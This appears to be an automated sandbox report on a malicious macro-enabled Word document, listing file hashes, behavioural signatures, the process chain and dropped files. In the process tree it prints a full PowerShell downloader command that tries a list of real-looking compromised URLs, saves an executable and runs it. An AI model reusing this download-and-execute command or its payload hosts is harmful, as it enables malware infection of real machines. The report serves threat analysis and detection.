Analysis

  • max time kernel: 69s
  • max time network: 156s
  • platform: windows7_x64
  • resource: win7-20220414-en
  • submitted: 21-05-2022 03:39

General

  • Target: DieKlage-01092020-1994462004.docm
  • Size: 90KB
  • MD5: 09c2efc28d71216d95c49b33f24af6e3
  • SHA1: b8b3a9a39486c91222494004ef2498e977ad7524
  • SHA256: 94027e02da7382882c8046e165ba9bdf7b3fc801ecf35ab3f004b1a3fdcc743c
  • SHA512: be8158bcb2a6adccffd5d5486b0d4c51463df654d017e0ca58466a9d46c9c23a9811200779333d803933c402c8f660200db1e7c5c89796c83e1c4f3ed9ab67a3

Score: 10/10

Malware Config

Extracted

Language: ps1
Deobfuscated
URLs

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DieKlage-01092020-1994462004.docm"
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:552
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      • Process spawned unexpected child process
      PID:1360
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:852

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion: Modify Registry, T1112 (1)
  • Discovery: System Information Discovery, T1082 (1)


Downloads

  • C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd
    Filesize: 24KB
    MD5: db94c28610cb83c3056f1ae4e3e80463
    SHA1: 174cb2cc87ff32c50b752a94eda80121811014bd
    SHA256: 72223739a61890dac3cef9147aaa16b447d977cdf6ee413535a2826931db2b2d
    SHA512: f94ec877c58b4c5aa503e2fff42deb8925c17d7fddbf4d10e4856b2254dc81117d0f9a1ec21ed4444a3e90d2c28e86fd1e776448f3aa80cb8977ca7021cb85e9

  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    Filesize: 74KB
    MD5: 5ba27fb265515da4386aa9c025826e3a
    SHA1: 16a4dfd513bd36714e560a3fcca8c3b846e2da57
    SHA256: f9655447610215ddd56d097ea5bdeaaa1f7a730d66945c0cc86d8de51c5bb15e
    SHA512: 977e4954d5ec90f2306d34f95fc4898e1309f1272306c3e70616738ef49eb1f53b8689580d8ddffa677f02b68ba90ef4f0ad45456a4e27ac9367f284823819b3

  • memory/552-58-0x000000007136D000-0x0000000071378000-memory.dmp (Filesize: 44KB)
  • memory/552-65-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/552-56-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/552-57-0x0000000075451000-0x0000000075453000-memory.dmp (Filesize: 8KB)
  • memory/552-54-0x0000000072901000-0x0000000072904000-memory.dmp (Filesize: 12KB)
  • memory/552-55-0x0000000070381000-0x0000000070383000-memory.dmp (Filesize: 8KB)
  • memory/852-69-0x0000000000000000-mapping.dmp
  • memory/852-74-0x000000000257B000-0x000000000259A000-memory.dmp (Filesize: 124KB)
  • memory/852-73-0x000000001B6E0000-0x000000001B9DF000-memory.dmp (Filesize: 3.0MB)
  • memory/852-72-0x0000000002574000-0x0000000002577000-memory.dmp (Filesize: 12KB)
  • memory/852-71-0x000007FEF38F0000-0x000007FEF444D000-memory.dmp (Filesize: 11.4MB)
  • memory/1360-61-0x000000006B101000-0x000000006B103000-memory.dmp (Filesize: 8KB)
  • memory/1360-59-0x0000000000000000-mapping.dmp
  • memory/1408-67-0x0000000000000000-mapping.dmp
  • memory/1676-62-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp (Filesize: 8KB)
  • memory/1824-64-0x0000000000000000-mapping.dmp